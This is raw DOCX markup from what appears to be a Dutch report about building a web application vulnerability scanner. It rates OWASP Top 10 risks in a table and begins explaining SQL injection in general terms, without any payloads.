          <w:p w14:paraId="6FEB87F3" w14:textId="351100AD" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="39CB564F" w14:textId="5B328B7D" w:rsidR="001A6DC7" w:rsidRDefault="00E2354C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="52FD85A3"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79E64B9E" w14:textId="2F0429E2" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47AB66CD" w14:textId="0D24318D" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">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1593B48C" w14:textId="5A38A2FD" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E820BD1" w14:textId="40FDA912" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">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3E0C2A2A" w14:textId="5FFAB785" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73BA73E8" w14:textId="49034ED0" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="576A1E36"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1ACD30D4" w14:textId="2A7710CC" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="62FCAFE1" w14:textId="6D478A57" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Heel Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="12F439A3" w14:textId="78EBF746" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">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3E53CF19" w14:textId="0ED13A02" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="303CC45B" w14:textId="3DE6910B" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="26459B78" w14:textId="52A35BE6" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Gemiddeld</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="5B01E428"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6D3D08F3" w14:textId="43F1D8EB" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D15F2BC" w14:textId="3D7C821D" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0DC619" w14:textId="3BF6BDF7" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2175A8F1" w14:textId="01681D03" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39DEE2C5" w14:textId="7B2153DE" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">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36AE6267" w14:textId="0F7E35D5" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="09372BC0"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7D030F" w14:textId="26FB0A7B" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="729AAB18" w14:textId="4ADAD04F" w:rsidR="001A6DC7" w:rsidRDefault="00A51EA9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A2AC62" w14:textId="3D53317C"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51" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BBFE66" w14:textId="0C653C21"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41" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381B5DE1" w14:textId="1A7484B0"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788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CED5DE1" w14:textId="2D48D79C" w:rsidR="001A6DC7" w:rsidRDefault="00A51EA9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245746" w14:paraId="3E636056"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5F5A1E29" w14:textId="09D6B70E" w:rsidR="00245746" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F43FE23" w14:textId="1E7170CA" w:rsidR="00245746" w:rsidRDefault="00A51EA9">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0E794621" w14:textId="215FFB7D" w:rsidR="00245746" w:rsidRDefault="00081392">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D84296B" w14:textId="66C0B733" w:rsidR="00245746" w:rsidRDefault="00A51EA9">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3235C803" w14:textId="251E5249" w:rsidR="00245746" w:rsidRDefault="00BC4CD0">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5446E245" w14:textId="093FEB90" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245746" w14:paraId="395A3262"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35F159" w14:textId="7437B691" w:rsidR="00245746" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6378BF1E" w14:textId="138FA9CC" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A48CF4C" w14:textId="2B8E10DE"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51" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46455194" w14:textId="15366D52"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41" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C5772BB" w14:textId="1BDDFCD0"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788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D95336" w14:textId="3AAC4884" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00232C33" w14:paraId="22525B93"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383D4428" w14:textId="0E493CBA" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="216C8A46" w14:textId="55FFAC39" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Niet Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C016DCE" w14:textId="14976159"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451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DDE5187" w14:textId="0E7E61EF"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14EA6BC8" w14:textId="217FD60F"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788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="003592EE" w14:textId="4043B4D2" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42C01BD0" w14:textId="3CAA77C1" w:rsidR="00A94B1E" w:rsidRDefault="002F0F65">
      <w:r>
        <w:t xml:space="preserve">Tabel 3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00A94B1E">
        <w:t>(OWASP detail pagina’s van risico’s, 2017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E224A1" w14:textId="6B462228" w:rsidR="0079562A" w:rsidRDefault="0079562A"/>
    <w:p w14:paraId="7C18449D" w14:textId="70F9F974" w:rsidR="00447F98" w:rsidRDefault="002777CC">
      <w:r>
        <w:t xml:space="preserve">In tabel 3.3 kun je </w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve">aan </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="0050302C">
        <w:t>oranje</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gekleurde</w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve"> regels zien welke risico’s ik gekozen</w:t>
      </w:r>
      <w:r w:rsidR="004D1AF5">
        <w:t xml:space="preserve"> heb</w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve"> om te implementeren in de </w:t>
      </w:r>
      <w:r w:rsidR="004D1AF5">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>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Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="0031090B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE0909">
        <w:t xml:space="preserve"> Deze zijn vaak tot heel v</w:t>
      </w:r>
      <w:r w:rsidR="003B6D36">
        <w:t xml:space="preserve">aak voorkomend en zijn makkelijk tot gemiddeld implementeerbaar in het systeem. </w:t>
      </w:r>
      <w:r w:rsidR="006246AA">
        <w:t>Wat ik ook he</w:t>
      </w:r>
      <w:r w:rsidR="00ED6183">
        <w:t>b opgemerkt is dat wanneer een r</w:t>
      </w:r>
      <w:r w:rsidR="006246AA">
        <w:t xml:space="preserve">isico oftewel kwetsbaarheid makkelijk exploiteerbaar is, is de </w:t>
      </w:r>
      <w:r w:rsidR="00847276">
        <w:t xml:space="preserve">implementatie </w:t>
      </w:r>
      <w:r w:rsidR="00632708">
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00847276">
        <w:t xml:space="preserve">van ook makkelijk. </w:t>
      </w:r>
      <w:r w:rsidR="00973012">
        <w:t xml:space="preserve">Hier is een simpele reden voor, een </w:t>
      </w:r>
      <w:r w:rsidR="00733C80">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00973012">
        <w:t xml:space="preserve"> scanner doet een poging om de kwetsbaarheid te exploitere</w:t>
      </w:r>
      <w:r w:rsidR="00F83B53">
        <w:t>n door een aanval te simuleren. Dit wordt in de meeste gevallen in ee</w:t>
      </w:r>
      <w:r w:rsidR="00782F49">
        <w:t>n veilige test omgeving gedaan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A9192" w14:textId="77777777" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FF5B24" w14:textId="082ABDFD" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252801024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="060DA004" wp14:editId="2EE5AED2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-905266</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-719620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="669" name="Rectangle 66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640A4" id="Rectangle 669" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.3pt;margin-top:-56.6pt;width:25pt;height:1031.7pt;z-index:-25051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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="428AFE06" w14:textId="77777777" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69400F4F" w14:textId="4AFD8017" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253343744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="329DC1E3" wp14:editId="07D7E3BF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-607652</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="510" name="Rectangle 51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8B125" id="Rectangle 510" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-47.8pt;width:25pt;height:1031.7pt;z-index:-2499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NbT5sCAACz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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAD6E4" w14:textId="0C7221A3" w:rsidR="00D96689" w:rsidRPr="00D173C6" w:rsidRDefault="00A15D95" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252144640" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68CF1ADC" wp14:editId="1A500A93">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-601597</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="462" name="Rectangle 46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30374" id="Rectangle 462" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.1pt;margin-top:-47.3pt;width:25pt;height:1031.7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C8J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i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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006A33B8">
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r w:rsidR="00FE6C9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E848BF">
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00622A99">
        <w:t>Kwetsbaarheden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44031CB4" w14:textId="4B8D560B" w:rsidR="00E12430" w:rsidRPr="008C7B6A" w:rsidRDefault="007A55BC" w:rsidP="00167992">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7B6A">
        <w:t xml:space="preserve">A1 </w:t>
      </w:r>
      <w:r w:rsidR="00F65ACF" w:rsidRPr="008C7B6A">
        <w:t>injectie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBB771" w14:textId="1956A30A" w:rsidR="004C2466" w:rsidRDefault="00A62D3F">
      <w:r>
        <w:t>Software-</w:t>
      </w:r>
      <w:r w:rsidR="004C2466">
        <w:t>ontwikkelaars gebruiken SQL queries om een actie uit te voeren op de database, deze queries hebben in sommige g</w:t>
      </w:r>
      <w:r w:rsidR="00757CBC">
        <w:t>evallen input nodig van de eind</w:t>
      </w:r>
      <w:r w:rsidR="0054015A">
        <w:t>gebruiker, zoals bij een inlog</w:t>
      </w:r>
      <w:r w:rsidR="004C2466">
        <w:t>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74E60">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311436B8" w14:textId="28AF1893"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68F87820" w:rsidR="004C2466" w:rsidRPr="00C66F67" w:rsidRDefault="009464BA" w:rsidP="009464BA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9799BF" w14:textId="0C6B6B91" w:rsidR="00FB6171" w:rsidRDefault="00241978">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70D2EB22" wp14:editId="116D23C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>368300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1450975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4851400" cy="2078990"/>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33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4851400" cy="2078990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D55CCE">
        <w:t>SQL-</w:t>
      </w:r>
      <w:r w:rsidR="00953B30" w:rsidRPr="00811D86">
        <w:t xml:space="preserve">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Dit gebeurt wannee</w:t>
      </w:r>
      <w:r w:rsidR="00D55CCE">
        <w:t>r de applicatie onverwachte SQL-</w:t>
      </w:r>
      <w:r w:rsidR="00E211A3">
        <w:t xml:space="preserve">commando’s opstuurt </w:t>
      </w:r>
      <w:r w:rsidR="00EE1080">
        <w:t xml:space="preserve">naar de server. </w:t>
      </w:r>
      <w:r w:rsidR="00D55CCE">
